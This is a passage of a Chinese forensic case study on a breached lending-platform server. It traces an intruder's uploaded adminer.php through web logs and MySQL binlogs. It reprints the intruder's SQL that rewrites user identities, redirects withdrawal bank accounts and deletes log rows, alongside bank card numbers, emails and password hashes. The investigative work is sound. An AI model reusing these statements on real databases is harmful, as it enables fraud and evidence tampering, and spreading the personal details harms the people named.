“7”，該日志訪問的url地址為“/modules/admin/adminer.php?username=cjd%7E777%5E&db=changjiudai&edit=dw_account_cash&where%5Bid%5D=13238”，該條日志使用的訪問方法為“GET”,該頁面的訪問返回狀態(tài)是“200”表明訪問正常。12.3.7分析Web日志對于該條日志中客戶端所訪問的url地址“/modules/admin/adminer.php?username=cjd%7E777%5E&db=changjiudai&edit=dw_account_cash&where%5Bid%5D=13238”該如何理解呢？可以認為該url地址由以下幾個部分組成，第1個部分是訪問的網頁是“/modules/admin/adminer.php”,在該網頁后由問號“?”將目標頁面與訪問時傳遞給該頁面的參數(shù)進行區(qū)分。問號“？”后的所有數(shù)據由參數(shù)及該參數(shù)對應的值組成。等號前“=”表示提交給目標頁面的參數(shù)名，等號“=”后表示該參數(shù)所對應的值。將該url地址直接在web瀏覽器中打開，看一下該url地址對應的返回結果，省卻了靜態(tài)分析代碼的過程。12.3.7分析Web日志該url地址對應的返回結果見下圖:圖12-2512.3.7分析Web日志從上圖可以得知，訪問該url地址對應編輯數(shù)據庫“changjiudai”中的表“dw_account_cash”中的id號為“13238”的用戶帳戶信息。該表中表名對應url地址中的參數(shù)“edit”，用戶“id”對應url地址中的參數(shù)“where[id]”的值。從上述日志分析結果可知，通過訪問文件“adminer.php”可以完全操控被入侵服務器中的MySQL數(shù)據庫中的數(shù)據。因此通過分析Web日志中“adminer.php”的訪問記錄可以分析出入侵者對檢材服務器的數(shù)據庫進行過哪些操作。12.3.7分析Web日志執(zhí)行指令“grep-E-I-o“user_id%5d=[0-9]{1,8}adminer.php.exclude.alibaba.log”從390條“adminer.php”文件的訪問記錄中提取到涉及4個用戶ID的修改記錄：1392,1679,2613,6248，見下圖:圖12-2612.3.7分析Web日志執(zhí)行指令“cut-d:-f2adminer.php.exclude.alibaba.log|cut-d''-f1|sort|uniq-c|sort-r”對上述所有390條訪問記錄中的IP地址進行提取并統(tǒng)計各個IP地址的訪問次數(shù)，見下圖：圖12-2712.3.7分析Web日志通過網絡分析上述所有訪問過“adminer.php”文件的IP地址歸屬地，見下圖:圖12-2812.3.7分析Web日志從上述查詢結果來看，大部分歸屬地處于境外，推測入侵者使用代理服務器進行攻擊的可能性比較大。12.3.7分析Web日志上述IP地址段中有兩個IP地址處于上海市的地址范圍。對上述兩個IP地址的訪問記錄進行提取,共提取到3個IP地址的訪問記錄：access_log-20150601:14--[31/May/2015:21:50:20+0800]"GET/MODULES/ADMIN/ADMINER.PHP?USERNAME=CJD~777^&DB=CHANGJIUDAI&SQL=HTTP/1.1"404549"-""Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/31.0.1650.63Safari/537.36“access_log-20150601:14--[31/May/2015:21:50:20+0800]"GET/404/image/background.pngHTTP/1.1"20074669"/MODULES/ADMIN/ADMINER.PHP?USERNAME=CJD~777^&DB=CHANGJIUDAI&SQL=""Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/31.0.1650.63Safari/537.36“access_log-20150603:65--[02/Jun/2015:13:41:28+0800]"GET/themes/default/images/index/logoshow.jpgHTTP/1.1"2005397"http://localhost/index.php/adminer.php""Mozilla/5.0(WindowsNT6.2;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/31.0.1650.63Safari/537.36"12.3.7分析Web日志根據與管理員的溝通上述3條訪問記錄屬于服務器管理員發(fā)現(xiàn)服務器異常后的訪問記錄，其中第1條訪問記錄的返回狀態(tài)代碼為404表明該記錄產生時該文件已不存。另外兩條訪問記錄分析其訪問代碼未發(fā)現(xiàn)任何對服務器數(shù)據的實質性破壞，可以排除上述兩個IP地址的可疑。12.3.7分析Web日志余下10個IP地址的訪問記錄，見下圖：圖12-2912.3.7分析Web日志以上述10個IP地址作為關鍵詞對所有web日志進行搜索，提取上述10個IP地址的所有訪問記錄“find./log/-typef|xargs-I{}grep-a-i-fadminer_uniq_ip.txt{}>adminer_uniq_ip_all_.log”。從上述所有web訪問記錄中提取10個入侵者IP的所有訪問記錄共1008條，共245KB，將上述所有訪問記錄保存到“adminer_uniq_ip_all_.log”文件中。從上述提取到的1008條訪問記錄中分析所有上述訪問記錄的時間信息如下圖：圖12-3012.3.7分析Web日志上述分析結果表明入侵者對服務器中的數(shù)據進行修改的時間段集中在“2015年3月30日”、“2015年4月1日”、“2015年4月2日”、“2015年5月31日”這4天。下面我們對前面的分析結果做一個階段性的總結：1.檢材服務器的web目錄中存在一個可以完全操控數(shù)據庫能力的文件“adminer.php”，該文件并非由服務器管理員上傳，推測其由入侵者上傳并使用。2.檢材“adminer.php”具備完全操控mysql數(shù)據庫的能力，入侵者通過該文件可以直接修改服務器中用戶信息：身份證號、銀行卡號、提取金額、帳戶余額等任意數(shù)據。3.共提取到4條用戶數(shù)據操作記錄。4.共提取10個可疑IP地址全部位于日本、香港，猜測其可能是VPN。5.入侵者對服務器中的數(shù)據進行修改的時間為“2015年3月30日”、“2015年4月1日”、“2015年4月2日”、“2015年5月31日”。12.3.8分析數(shù)據庫根據上一小節(jié)中提取到的4個存在被修改用戶信息的用戶id，在在數(shù)據庫中執(zhí)行指令“selecta.user_id,a.username,a.card_id,a.realname,b.account,b.branch,d.total,d.use_money,d.no_use_moneyfromdw_userasaLEFTJOINdw_account_bankasbona.user_id=b.user_idleftjoindw_accountasdona.user_id=d.user_idwherea.user_id=1392ora.user_id=1679ora.user_id=2613ora.user_id=6248”提取這4個用戶的基本信息，見下圖：圖12-3112.3.8分析數(shù)據庫執(zhí)行指令“selectuser_id,total,money,use_money,no_use_money,remark,FROM_UNIXTIME(addtime,"%Y-%m-%d")fromdw_account_logwhereuser_id=6248andtype='cash_frost'”從數(shù)據庫的應用日志表“dw_account_log”中提取所有涉及上述4個用戶的提現(xiàn)操作記錄，見下圖：圖12-3212.3.8分析數(shù)據庫執(zhí)行指令“selectuser_id,total,money,use_money,no_use_money,remark,FROM_UNIXTIME(addtime,"%Y-%m-%d")fromdw_account_logwhereuser_id=6248andtype='cash_frost'”從數(shù)據庫的應用日志表“dw_account_log”中提取所有涉及上述4個用戶的提現(xiàn)操作記錄，見下圖：圖12-3312.3.8分析數(shù)據庫執(zhí)行指令“selectuser_id,total,money,use_money,no_use_money,remark,FROM_UNIXTIME(addtime,"%Y-%m-%d")fromdw_account_logwhereuser_id=6248andtype='cash_frost'”從數(shù)據庫的應用日志表“dw_account_log”中提取所有涉及上述4個用戶的提現(xiàn)操作記錄，見下圖：圖12-3412.3.8分析數(shù)據庫執(zhí)行指令“selectuser_id,total,money,use_money,no_use_money,remark,FROM_UNIXTIME(addtime,"%Y-%m-%d")fromdw_account_logwhereuser_id=6248andtype='cash_frost'”從數(shù)據庫的應用日志表“dw_account_log”中提取所有涉及上述4個用戶的提現(xiàn)操作記錄，見下圖：圖12-3512.3.8分析數(shù)據庫在數(shù)據庫中執(zhí)行指令“selectuser_id,total,money,use_money,no_use_money,remark,FROM_UNIXTIME(addtime,"%Y-%m-%d"),addipfromdw_account_logwhereuser_idin(6248,2613,1392,1679)andtype='cash_frost'”提取上述4涉案用戶的提取操作IP地址信息，見下圖：圖12-3612.3.8分析數(shù)據庫在數(shù)據庫中執(zhí)行指令“selectuser_id,total,money,use_money,no_use_money,remark,FROM_UNIXTIME(addtime,"%Y-%m-%d"),addipfromdw_account_logwhereuser_idin(6248,2613,1392,1679)andtype='cash_frost'”提取上述4涉案用戶的提取操作IP地址信息，見下圖：圖12-3712.3.8分析數(shù)據庫在數(shù)據庫中執(zhí)行指令“selectuser_id,total,money,use_money,no_use_money,remark,FROM_UNIXTIME(addtime,"%Y-%m-%d"),addipfromdw_account_logwhereuser_idin(6248,2613,1392,1679)andtype='cash_frost'”提取上述4涉案用戶的提取操作IP地址信息，見下圖：圖12-3812.3.8分析數(shù)據庫在數(shù)據庫中執(zhí)行指令“selectuser_id,total,money,use_money,no_use_money,remark,FROM_UNIXTIME(addtime,"%Y-%m-%d"),addipfromdw_account_logwhereuser_idin(6248,2613,1392,1679)andtype='cash_frost'”提取上述4涉案用戶的提取操作IP地址信息，見下圖：圖12-3912.3.8分析數(shù)據庫從上述提取到的提現(xiàn)IP地址中包含在“adminer.php”頁面訪問的10個IP地址列表中、提現(xiàn)時間與入侵者訪問時間段亦處于同一日期及時間段。對上述分析結果再做一個階段性總結如下：1.檢材數(shù)據庫中的確存在4條涉嫌數(shù)據被篡改用戶的提現(xiàn)記錄。2.上述4條提現(xiàn)記錄日期與apache日志中adminer.php訪問時間基本吻合。3.上述4條提現(xiàn)記錄的IP地址與adminer.php訪問IP吻合。4.入侵者可以通過“adminer.php”完全操縱目標服務器中的數(shù)據，所以dw_account_log表中的數(shù)據并不十分“可信”。12.3.9數(shù)據庫binlog日志轉換前面的分析結果提取了入侵者IP、可能的入侵時間、涉及受害者的用戶ID信息。但還沒有辦法從日志中分析出入侵者如何實現(xiàn)提現(xiàn)到自己的帳戶并將錢轉走，入侵者修改了系統(tǒng)中的哪些數(shù)據。調查員從檢材服務器中提取了MySQL數(shù)據庫的底層binlog日志。該日志文件的作用是保存所有對數(shù)據庫修改、增加、刪除記錄。MySQL數(shù)據庫的binlog日志屬于2進制文件，無法直接使用文本編輯器打開上述日志文件。使用MySQL自帶工具mysqlbinlog.exe可以將上述文件轉換為.sql純文本文件。執(zhí)行下列指令：Mysqlbinlog.exemysql-bin.000001>>all_binlog.sqlMysqlbinlog.exemysql-bin.000002>>all_binlog.sqlMysqlbinlog.exemysql-bin.000003>>all_binlog.sql12.3.9數(shù)據庫binlog日志轉換轉換結果all_binlog.sql文件為純文本文件，該文件總大小為3.19GB，該文件內容如下：圖12-4012.3.9數(shù)據庫binlog日志轉換該日志文件的開始記錄時間為“1501286:47:48”，日志結束時間為“15061913:42:25”。該日志時間完整覆蓋了入侵者攻擊服務器的日期時間范圍。12.3.10用戶id為2613用戶操作日志分析執(zhí)行指令“grep-C5-a-i-E“user_id=\'2613\'|user_id=2613”all_binlog.sql>2613.log”，查詢所有binlog操作日志中user_id=2613的操作記錄并保存到2613.log文件中。從該日志文件中提取到一條2015年3月30日凌晨2點35分28秒的操作記錄，該記錄更新了用戶id為2613的用戶信息，更新用戶名為“康靜”、身份證號碼為代碼如下：#at49371671#1503302:35:28serverid100end_log_pos49372187 Query thread_id=1829851 exec_time=0 error_code=0SETTIMESTAMP=1427654128/*!*/;update`dw_user`setpassword='827ccb0eea8a706c4c34a16891f84e7b',paypassword='827ccb0eea8a706c4c34a16891f84e7b',realname='康靜',sex='2',card_id=,card_pic1='data/upfiles/images/2014-10/23/2613_userjpg',card_pic2='data/upfiles/images/2014-10/23/2613_userjpg',birthday='147369600',province=3369,city=3370,area=3374,email='20088108@163.com',phone=,lastip='91'whereuser_id=2613/*!*/;#at4937218712.3.10用戶id為2613用戶操作日志分析上述更新操作時間處于入侵者訪問adminer.php的時間范圍。該更新操作的IP地址為“91”。2015年3月30日凌晨2點37分08秒，用戶提現(xiàn)申請記錄表dw_account_cash中更新了一條用戶id號為2613的用戶提現(xiàn)記錄,提現(xiàn)的銀行卡號為“6217000010048063385”、開戶行地址為“北京豐臺萬年花城支行”：#at49378905#1503302:37:08serverid100end_log_pos49379101 Query thread_id=1829885 exec_time=0 error_code=0SETTIMESTAMP=1427654228/*!*/;update`dw_account_cash`setbank=302,account='6217000010048063385',branch='北京豐臺萬年花城支行'whereuser_id=2613/*!*/;#at4937910112.3.10用戶id為2613用戶操作日志分析2015年3月30日凌晨2點38分33秒，用戶操作記錄日志表dw_account_log中用戶操作記錄被刪除，該刪除操作僅刪除了用戶id為2613,且日志id號大于81869的操作記錄，推測此操作是入侵者為了隱藏自身的提現(xiàn)操作：#at49384487#1503302:38:33serverid100end_log_pos49384615 Query thread_id=1829909 exec_time=0 error_code=0SETTIMESTAMP=1427654313/*!*/;deletefromdw_account_logwhereuser_id=2613ANDid>81869/*!*/;#at4938461512.3.10用戶id為2613用戶操作日志分析2015年3月30日凌晨2點39分24秒，用戶id為2613的用戶帳戶余額減少了101675：#at49390546#1503302:39:24serverid100end_log_pos49390726 Query thread_id=1829924 exec_time=0 error_code=0SETTIMESTAMP=1427654364/*!*/;update`dw_account`set`use_money`=`use_money`-101675,`no_use_money`=`no_use_money`+101675whereuser_id=2613/*!*/;#at4939072612.3.10用戶id為2613用戶操作日志分析2015年3月30日上午9點58分，用戶id為2613的用戶帳戶余額中的錢被成功扣除：#at59557892#1503309:58:00serverid100end_log_pos59558070 Query thread_id=1835223 exec_time=0 error_code=0SETTIMESTAMP=1427680680/*!*/;update`dw_account`set`total`=`total`-101675.00,`no_use_money`=`no_use_money`-101675.00whereuser_id=2613/*!*/;#at5955807012.3.10用戶id為2613用戶操作日志分析2015年4月1日用戶id為2613的用戶信息被再次更新，其用戶名被更新為“吳冰”、身份證號碼變更為：#15040117:57:05serverid100end_log_pos103543901 Query thread_id=1894619 exec_time=0 error_code=0SETTIMESTAMP=1427882225/*!*/;update`dw_user`setpassword='5badc23249c416223c98aa6ab09c841a',paypassword='5a557b96af35e650862b41a609ff9ec4',realname='吳冰',sex='2',card_id=,card_pic1='data/upfiles/images/2014-10/23/2613_usergif',card_pic2='data/upfiles/images/2014-10/23/2613_usergif',birthday='95616000',province=40,city=41,area=56,email='20089108@163.com',phone=,lastip='91',lasttime='1419259735'whereuser_id=261312.3.10用戶id為2613用戶操作日志分析2015年4月1日17點57分45秒，用戶id為2613用戶的銀行卡信息被再次更新，銀行卡號被更改為“9843010102287035”，開戶行地址被更改為“松江區(qū)樂都路支行”：#15040117:57:45serverid100end_log_pos103546154 Query thread_id=1894633 exec_time=0 error_code=0SETTIMESTAMP=1427882265/*!*/;update`dw_account_cash`setbank=471,account='9843010102287035',branch='松江區(qū)樂都路支行'whereuser_id=261312.3.10用戶id為2613用戶操作日志分析上述更新操作發(fā)生后沒有產生提現(xiàn)記錄。12.3.10用戶id為2613用戶操作日志分析2015年5月31日，該用戶的用戶信息被更新，用戶名被更改為“吳志樂”、身份證號被更改為，更新時使用的IP地址為“86”：#15053121:00:09serverid100end_log_pos1050189170 Query thread_id=3775992 exec_time=0 error_code=0SETTIMESTAMP=1433077209/*!*/;update`dw_user`setpassword='e10adc3949ba59abbe56e057f20f883e',paypassword='e10adc3949ba59abbe56e057f20f883e',realname='吳志樂',sex='1',card_id=,card_pic1='data/upfiles/images/2014-10/07/2613_userJPG',card_pic2='data/upfiles/images/2014-10/07/2613_userJPG',birthday='398534400',province=61,city=62,area=74,qq='404185888',email='20089008@163.com',phone=,lastip='86'whereuser_id=261312.3.10用戶id為2613用戶操作日志分析2015年5月31日21點02分20秒，該用戶提現(xiàn)記錄表中被插入了一條提現(xiàn)記錄，提現(xiàn)銀行卡號為“6212262111003454512”，提取銀行卡開戶行地址為“玉林博白支行營業(yè)室”，提現(xiàn)時使用的IP地址為“45”：#15053121:02:20serverid100end_log_pos1050209839 Query thread_id=3776048 exec_time=0 error_code=0SETTIMESTAMP=1433077340/*!*/;BEGIN----insertinto`dw_account_cash`set`addtime`='1433077427',`addip`='45',`user_id`='2613',`status`='0',`total`='101675',`account`='6212262111003454512',`bank`='300',`branch`='玉林博白支行營業(yè)室',`credited`='101675',`fee`='0'12.3.10用戶id為2613用戶操作日志分析2015年6月1日上午9點29分13秒，用戶帳戶日志中被插入一條提現(xiàn)失敗的記錄，該異常操作被管理員發(fā)現(xiàn)終止了入侵者的提現(xiàn)行為：#1506019:29:13serverid100end_log_pos1348099 IntvarSETINSERT_ID=321821/*!*/;#at1348099----insertinto`dw_account_log`set`addtime`='1433122153',`addip`='65',`user_id`='2613',`type`='recharge_false',`money`='101675.00',`total`='101675.00',`use_money`='101675',`no_use_money`='0',`collection`='0.00',`to_user`='0',`remark`='提現(xiàn)失敗'12.3.11用戶id為1679用戶操作日志分析2015年3月30日凌晨2點51分29秒，該用戶信息被更新真實姓名變?yōu)椤皡侵緲贰?，身份證號為,更新使用的IP地址為“22”：#1503302:51:29serverid100end_log_pos49421920Querythread_id=1830014exec_time=0error_code=0SETTIMESTAMP=1427655089/*!*/;update`dw_user`setpassword='e10adc3949ba59abbe56e057f20f883e',paypassword='e10adc3949ba59abbe56e057f20f883e',realname='吳志樂',sex='1',card_id=,card_pic1='data/upfiles/images/2014-08/15/1679_userjpg',card_pic2='data/upfiles/images/2014-08/15/1679_userjpg',birthday='398534400',province=61,city=62,area=74,qq='404185888',email='chemyue588@163.com',phone=,lastip='22'whereuser_id=167912.3.11用戶id為1679用戶操作日志分析2015年3月30日凌晨2點52分26秒，入侵者刪除了用戶操作記錄：#1503302:52:26serverid100end_log_pos49422667Querythread_id=1830035exec_time=0error_code=0SETTIMESTAMP=1427655146/*!*/;deletefromdw_account_logwhereuser_id=1679ANDid>13749712.3.11用戶id為1679用戶操作日志分析2015年3月30日凌晨2點52分26秒，用戶的銀行卡信息被更新：#1503302:52:36serverid100end_log_pos49422973Querythread_id=1830039exec_time=0error_code=0SETTIMESTAMP=1427655156/*!*/;update`dw_account_cash`setbank=300,account='6212262111003454512',branch='玉林博白支行營業(yè)室'whereuser_id=167912.3.11用戶id為1679用戶操作日志分析2015年3月30日凌晨2點52分32秒，用戶操作日志